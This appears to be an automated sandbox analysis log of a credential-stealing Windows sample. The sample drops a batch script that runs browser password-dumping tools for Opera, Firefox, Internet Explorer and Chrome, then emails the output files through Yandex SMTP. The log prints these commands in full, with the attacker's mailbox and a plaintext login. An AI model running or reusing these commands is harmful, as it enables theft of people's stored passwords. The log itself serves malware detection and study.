              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040BFA0 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_0040BFA0
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeCode function: 0_2_004014CB GetSystemDirectoryA,PathAddBackslashA,GetWindowsDirectoryA,PathAddBackslashA,GetTempPathA,PathAddBackslashA,GetModuleFileNameA,PathFindFileNameA,GetEnvironmentVariableA,PathAddBackslashA,SHGetSpecialFolderPathA,PathAddBackslashA,SHGetSpecialFolderPathA,PathAddBackslashA,FindResourceA,SizeofResource,LoadResource,LockResource,GlobalAlloc,RtlMoveMemory,GlobalAlloc,RtlMoveMemory,RtlDecompressBuffer,GlobalFree,lstrcpynA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,PathAddBackslashA,lstrcatA,lstrcpyA,CreateFileA,WriteFile,HeapAlloc,WriteFile,HeapFree,CreateFileA,GetFileSize,CloseHandle,HeapAlloc,WriteFile,HeapFree,CloseHandle,GlobalFree,SetFileAttributesA,lstrcpyA,PathFindFileNameA,ShellExecuteA,FreeResource,ExitProcess,ExitProcess,0_2_004014CB
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeFile created: C:\Users\user\AppData\Local\Temp\ .exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
              Source: 0zu73p2YBu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: ChromePass.exe, 0000000F.00000003.1785680506.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: 0zu73p2YBu.exeReversingLabs: Detection: 100%
              Source: .exeString found in binary or memory: tername%_iepv.txt ping -n 3 127.0.0.1 > nul start ChromePass.exe /stext %computername%_ChromePass.txt ping -n 120 127.0.0.1 > nul blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
              Source: .exeString found in binary or memory: -installIMAP
              Source: .exeString found in binary or memory: -install
              Source: .exeString found in binary or memory: -installSMTP
              Source: .exeString found in binary or memory: -installNNTP
              Source: .exeString found in binary or memory: -installPOP3
              Source: .exeString found in binary or memory: %s------------Start of Session-----------------
              Source: .exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: .exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: .exeString found in binary or memory: Profiles are listed as in the -install option:
              Source: .exeString found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
              Source: .exeString found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
              Source: .exeString found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
              Source: .exeString found in binary or memory: or: blat -installSMTP SMTPHost Sender [Try [Port [Profile
              Source: .exeString found in binary or memory: To modify SMTP: blat -install SMTPHost Sender [Try [Port [Profile [Login name
              Source: .exeString found in binary or memory: use -installIMAP for storing IMAP information
              Source: .exeString found in binary or memory: use -installPOP3 for storing POP3 information
              Source: .exeString found in binary or memory: use -installNNTP for storing NNTP information
              Source: .exeString found in binary or memory: same parameters as -install, and is only for SMTP settings.
              Source: .exeString found in binary or memory: : displays this help (also -?, /?, -help or /help)
              Source: .exeString found in binary or memory: -help
              Source: .exeString found in binary or memory: Blat -install <server addr> <sender's addr> [<try>[<port>[<profile>]]] [-q]
              Source: .exeString found in binary or memory: To set the NNTP server's address and the user name at that address do: blat -installNNTP server username
              Source: .exeString found in binary or memory: To set the POP3 server's address and the login name at that address do: blat -installPOP3 server - - - - loginname loginpwd
              Source: .exeString found in binary or memory: To set the IMAP server's address and the login name at that address do: blat -installIMAP server - - - - loginname loginpwd
              Source: PasswordFox.exeString found in binary or memory: /installfolder
              Source: blat.exeString found in binary or memory: Profiles are listed as in the -install option:
              Source: blat.exeString found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
              Source: blat.exeString found in binary or memory: -install
              Source: blat.exeString found in binary or memory: To set the POP3 server's address and the login name at that address do: blat -installPOP3 server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: To set the IMAP server's address and the login name at that address do: blat -installIMAP server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
              Source: blat.exeString found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
              Source: blat.exeString found in binary or memory: %s------------Start of Session-----------------
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To set the NNTP server's address and the user name at that address do: blat -installNNTP server username
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for thatserver machine do:blat -install server_name your_email_addressor use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for thatserver machine do:blat -install server_name your_email_addressor use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
              Source: blat.exeString found in binary or memory: Profiles are listed as in the -install option:
              Source: blat.exeString found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
              Source: blat.exeString found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
              Source: blat.exeString found in binary or memory: To set the POP3 server's address and the login name at that address do:blat -installPOP3 server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: %s------------Start of Session-----------------
              Source: blat.exeString found in binary or memory: To set the IMAP server's address and the login name at that address do:blat -installIMAP server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: To set the NNTP server's address and the user name at that address do:blat -installNNTP server username
              Source: blat.exeString found in binary or memory: Profiles are listed as in the -install option:
              Source: blat.exeString found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
              Source: blat.exeString found in binary or memory: -install
              Source: blat.exeString found in binary or memory: To set the POP3 server's address and the login name at that address do: blat -installPOP3 server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: To set the IMAP server's address and the login name at that address do: blat -installIMAP server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
              Source: blat.exeString found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
              Source: blat.exeString found in binary or memory: %s------------Start of Session-----------------
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To set the NNTP server's address and the user name at that address do: blat -installNNTP server username
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for thatserver machine do:blat -install server_name your_email_addressor use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for thatserver machine do:blat -install server_name your_email_addressor use '-server <server_name>' and '-f <your_email_address>'
              Source: blat.exeString found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
              Source: blat.exeString found in binary or memory: Profiles are listed as in the -install option:
              Source: blat.exeString found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
              Source: blat.exeString found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
              Source: blat.exeString found in binary or memory: To set the POP3 server's address and the login name at that address do:blat -installPOP3 server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: %s------------Start of Session-----------------
              Source: blat.exeString found in binary or memory: To set the IMAP server's address and the login name at that address do:blat -installIMAP server - - - - loginname loginpwd
              Source: blat.exeString found in binary or memory: To set the NNTP server's address and the user name at that address do:blat -installNNTP server username
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-4413
              Source: unknownProcess created: C:\Users\user\Desktop\0zu73p2YBu.exe "C:\Users\user\Desktop\0zu73p2YBu.exe"
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeProcess created: C:\Users\user\AppData\Local\Temp\ .exe "C:\Users\user\AppData\Local\Temp\ .exe"
              Source: C:\Users\user\AppData\Local\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe PasswordFox.exe /stext user-PC_PasswordFox.txt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe iepv.exe /stext user-PC_iepv.txt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "user-PC_iepv.txt" -body "ie"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeProcess created: C:\Users\user\AppData\Local\Temp\ .exe "C:\Users\user\AppData\Local\Temp\ .exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe PasswordFox.exe /stext user-PC_PasswordFox.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe iepv.exe /stext user-PC_iepv.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1Jump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ .exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: twinui.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mrmcorer.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositorycore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: napinsp.dllJump to behavior
